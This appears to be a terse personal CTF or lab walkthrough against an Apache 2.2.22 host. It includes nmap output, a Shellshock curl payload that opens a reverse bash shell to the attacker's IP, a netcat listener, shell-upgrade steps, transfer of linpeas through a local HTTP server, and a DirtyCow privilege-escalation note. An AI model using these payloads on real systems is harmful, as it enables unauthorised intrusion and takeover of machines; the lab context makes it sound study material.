Web Portal Have a exploit of apache 2.22.22

nmap -A <ip>
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-06 10:06 EST
Nmap scan report for 192.168.60.87
Host is up (0.00021s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 06:cb:9e:a3:af:f0:10:48:c4:17:93:4a:2c:45:d9:48 (DSA)
|   2048 b7:c5:42:7b:ba:ae:9b:9b:71:90:e7:47:b4:a4:de:5a (RSA)
|_  256 fa:81:cd:00:2d:52:66:0b:70:fc:b8:40:fa:db:18:30 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.72 seconds

Step 1:-
IN MY SIDE
_> curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/<localip_myip>/4444 0>&1' http://<server_ip>/cgi-bin/test
_> nc -lvnp 4444
_>> Attack Side
_> REF:- https://book.hacktricks.xyz/shells/shells/full-ttys
-> python -c 'import pty; pty.spawn("/bin/bash")'
_> CTRL+Z and stty raw -ech;fg and
_> export TERM=xterm 

REF:- https://book.hacktricks.xyz/pentesting/pentesting-web/cgi
Step 2:-
Install In My side
wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh
cat li* -> for check
then 
_> python -m http.server 80 # in same dir in which you download the script
-> In Attacker Side 
_> cd /tmp
_> wget/curl <ip_of_my>/<file_name>*
_> DirtyCOw -> Ubuntu version exploit and sudo too
